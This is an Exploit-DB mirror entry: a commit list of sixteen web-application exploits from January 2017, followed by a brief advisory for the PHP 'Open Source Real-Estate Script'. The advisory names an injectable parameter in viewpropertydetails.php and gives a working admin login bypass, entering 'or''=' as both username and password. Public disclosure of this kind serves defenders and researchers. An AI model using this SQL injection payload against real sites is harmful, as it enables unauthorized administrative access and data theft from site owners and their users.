exploit-db-mirror/platforms/php/webapps/41047.txt
Offensive Security a577caaebb DB: 2017-01-15
16 new exploits

My Private Tutor Website Script - Authentication Bypass
Hindu Matrimonial Script - Authentication Bypass
Just Dial Marketplace Script - Authentication Bypass
Entrepreneur Matrimonial Script - Authentication Bypass
Open Source Real-Estate Script - SQL Injection
Inout StickBoard 1.0 Script - Improper Access Restrictions
Inout Search Engine Ultimate Edition 7.0/8.0 Script - Improper Access Restrictions
Inout Webmail Ultimate Edition 4.0 Script - Improper Access Restrictions
Inout SmartDeal 1.0 Script - Improper Access Restrictions
Inout QuerySpace 1.0 Script - Improper Access Restrictions
Inout CareerLamp 1.0 Script - Improper Access Restrictions
Inout SocialTiles 2.0 Script - Improper Access Restrictions
Inout Celebrities 1.0 Script - Improper Access Restrictions
Education Website Script - Authentication Bypass
Professional Service Booking Script - SQL Injection
Courier Business Website Script - Authentication Bypass
2017-01-15 05:01:17 +00:00

16 lines
No EOL
592 B
Text
Executable file

# # # # #
# Vulnerability: SQL Injection + Admin Login Bypass
# Date: 13.01.2017
# Vendor Homepage: http://phprealestatescript.org/
# Script Name: Open Source Real-Estate Script
# Script Buy Now: http://phprealestatescript.org/open-source-real-estate-script.html
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/viewpropertydetails.php?id=[SQL]
#
# Admin Login Bypass
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# # # # #